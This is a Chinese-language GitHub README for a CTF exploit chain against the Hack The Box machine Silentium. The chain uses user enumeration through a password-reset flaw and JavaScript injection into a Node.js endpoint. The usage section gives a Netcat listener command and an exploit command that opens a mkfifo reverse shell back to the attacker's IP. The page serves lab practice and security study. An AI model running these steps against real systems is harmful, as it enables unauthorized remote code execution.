jwsly12/CVE-2025-58434-59528-htb-ctf

GitHub: jwsly12/CVE-2025-58434-59528-htb-ctf

针对 Silentium 靶机的两阶段漏洞利用链,通过用户枚举与 JavaScript 注入实现远程代码执行。

Stars: 0 | Forks: 0

# CVE-2025-58434-59528-htb-ctf # 静默链利用 本仓库包含针对 **Silentium** 机器的完整利用链。该漏洞利用涉及用户枚举和 JavaScript 注入的两阶段漏洞,以实现 **远程代码执行 (RCE)**。 ## 📝 描述 该漏洞链由信息泄露缺陷和关键代码注入组成。首先通过密码重置漏洞枚举有效用户,从而获得必要的上下文以针对 customMCP 端点。RCE 是通过将恶意 JavaScript 函数注入到 mcpServerConfig 参数中实现的,该函数由 Node.js 后端执行。 ## 🛠️ 功能特性 * **用户枚举**:使用单词表自动发现有效的系统邮箱。 * **JavaScript 注入**:利用 IIFE(立即调用函数表达式)绕过净化。 * **TCP 反向 Shell**:使用 mkfifo 管道生成稳定的 Shell。 * **载荷自动化**:自动处理 JSON 转义和 Bearer Token 身份验证。 ## 🚀 要求 您必须安装 Python 3 和 Bash,以及以下库: pip install requests ## 💻 使用方法 ### 1. 枚举用户 运行枚举脚本(Bash)以查找有效账户(需要 users.txt): chmod +x CVE-2025-58434.sh ./CVE-2025-58434.sh ### 2. 启动监听器 在本地机器上启动 Netcat 监听器: nc -lvnp 4444 ### 3. 运行利用脚本 执行 Python 脚本,提供目标、您的 IP 和获取的 API 密钥: python3 CVE-2025-59528.py -t <目标> -k -l <您的 IP> -p 4444 ## ⚙️ 参数 | 参数 | 描述 | 是否必需 | | :--- | :--- | :--- | | -t, --target | 目标主机 | **是** | | -k, --key | API Bearer 令牌 | **是** | | -l, --lhost | 监听器 IP (VPN) | **是** | | -p, --lport | 监听器端口 | **是** | ## ⚠️ 免责声明 本脚本仅供教育用途和授权渗透测试,仅限 CTF 环境使用。未经授权访问或攻击目标属于非法行为。 **挑战:** Silentium (Hack The Box) **CVE:** CVE-2025-58434 | CVE-2025-59528
标签:API 认证, Bearer Token, CVE-2025-58434, CVE-2025-59528, GNU通用公共许可证, HackTheBox, HTB, IIFE, JavaScript注入, JSON注入, MITM代理, mkfifo, Netcat, Node.js, PWN, Python自动化, TCP反向Shell, 代码执行, 信息泄露, 前端到后端, 参数污染, 后端注入, 客户端注入, 密码重置, 应用安全, 数据可视化, 用户枚举, 编程工具, 网络监听, 远程代码执行, 逆向工具